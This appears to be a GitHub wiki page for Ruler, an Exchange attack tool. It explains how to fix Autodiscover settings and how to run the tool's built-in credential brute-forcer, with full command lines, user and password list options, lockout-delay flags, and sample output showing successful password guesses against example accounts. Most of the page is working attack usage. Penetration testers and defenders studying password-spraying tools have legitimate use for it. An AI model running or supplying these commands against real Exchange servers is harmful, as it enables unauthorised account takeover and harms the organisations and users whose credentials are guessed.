-
Notifications
You must be signed in to change notification settings - Fork 358
Brute Force
While Ruler makes a best effort to "autodiscover" the necessary settings, you may still run into instances of it failing. The common causes are:
- autodiscover deployed over http and not https (we default to https as this is more common)
- No autodiscover DNS record
- Authentication failing
If you encounter an Exchange server where the Autodiscover service is failing, you can manually specify the Autodiscover URL:
./ruler --url http://autodiscover.somedomain.com/autodiscover/autodiscover.xml
If you run into issues with Authentication (and you know the creds are correct), you can try and force the use of basic authentication with the global --basic
The global --verbose
flag will also give you some insight into the process being used by the autodiscover service.
If you go the brute-force route, Ruler is your friend. It has a built-in brute-forcer which does a semi-decent job of finding creds.
./ruler --domain targetdomain.com brute --users /path/to/user.txt --passwords /path/to/passwords.txt
You should see your brute-force in action:
./ruler --domain evilcorp.ninja --insecure brute --users ~/users.txt --passwords ~/passwords.txt --delay 0 --verbose
[*] Starting bruteforce
[x] Failed: bob.dole:P@ssw0rd
[x] Failed: george.bush:P@ssw0rd
[x] Failed: bill.clinton:P@ssw0rd
[x] Failed: bob.dole:August2016
[x] Failed: george.bush:August2016
[+] Success: bill.clinton:August2016
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: bob.dole:Evilcorp@2016
[x] Failed: george.bush:Evilcorp@2016
[x] Failed: bob.dole:3V1lc0rp
[x] Failed: george.bush:3V1lc0rp
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: george.bush:Password1
[+] Success: bob.dole:Password1
Alternatively, you can specify a userpass file with the --userpass
option. The userpass file should be colon-delimited with one pair of credentials per line:
$ cat userpass.txt
bill.clinton:August2016
george.bush:Password!2016
bob.dole:Password1
./ruler --domain evilcorp.ninja --insecure brute --userpass userpass.txt -v
[*] Starting bruteforce
[+] Success: bill.clinton:August2016
[x] Failed: george.bush:Password!2016
[+] Success: bob.dole:Password1
There are a few other flags that work with brute
These are:
- --stop //stop on the first valid username:password combo
- --delay //how long to wait between multiple password guesses
- --attempts //how many attempts before we delay (attempts per user)
- --insecure //if the Exchange server has a bad SSL cerificate
- --verbose //be verbose and show failed attempts